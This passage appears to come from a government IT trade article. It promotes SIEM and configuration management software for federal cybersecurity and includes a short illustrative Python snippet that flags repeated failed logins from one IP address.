Software acquisition can be more efficient and budget friendly. Agencies can download specific tools at lower costs. Further, these tools are typically designed to work in heterogeneous environments. These factors can help IT managers cut through red tape while saving money.

 

The right to bear software

 

No revolution can be won without the proper tools, however. Thankfully, the tools that IT managers have at their disposal in the fight against cyber threats are numerous and powerful.

 

The primary weapon is security information and event management (SIEM) software. Automated SIEM solutions can help managers proactively identify potential threats and react to them as they occur. Agencies can monitor and log events that take place on the network—for instance, when suspicious activity is detected from a particular IP address. Administrators can react by blocking access to a user or device, or identifying and addressing policy and compliance violations.
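
As a drastically simplified sketch of that detect-and-react loop (my own illustration; the event fields and threshold are invented, not from the survey or any product), the core of it is correlating events by source and alerting past a threshold:

    from collections import Counter

    FAILED_LOGIN_THRESHOLD = 5  # illustrative policy, not from the survey

    events = [  # stand-in for a parsed event feed from network logs
        {"type": "failed_login", "src_ip": "203.0.113.7"},
        {"type": "failed_login", "src_ip": "203.0.113.7"},
        # ... more events ...
    ]

    # Count suspicious events per source IP and flag anything over the threshold
    failures = Counter(e["src_ip"] for e in events if e["type"] == "failed_login")
    for ip, count in failures.items():
        if count >= FAILED_LOGIN_THRESHOLD:
            print(f"ALERT: {count} failed logins from {ip} -- consider blocking")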

 

These solutions have been successful in helping agencies detect and manage threats. According to our survey respondents, users of SIEM software are better able to detect, within minutes, almost all threats listed on the survey. Other tools, such as configuration management software that lets managers automatically adjust and monitor changes in network configurations, have also proven effective at reducing the time it takes to respond to IT security incidents.

 

Hamilton once said, “A promise must never be broken.” The promise that federal IT managers must make today is to do everything they can to protect their networks from mounting cybersecurity threats. It’s certainly not an easy task, but with the right strategies and tools, it might very well be a winnable battle.

 

Find the full article on GovLoop.
